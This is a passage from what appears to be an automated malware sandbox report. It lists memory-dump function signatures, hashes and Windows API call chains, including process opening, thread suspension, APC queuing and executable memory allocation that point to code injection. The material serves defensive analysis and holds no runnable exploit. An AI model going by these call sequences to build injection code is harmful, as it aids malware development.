    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
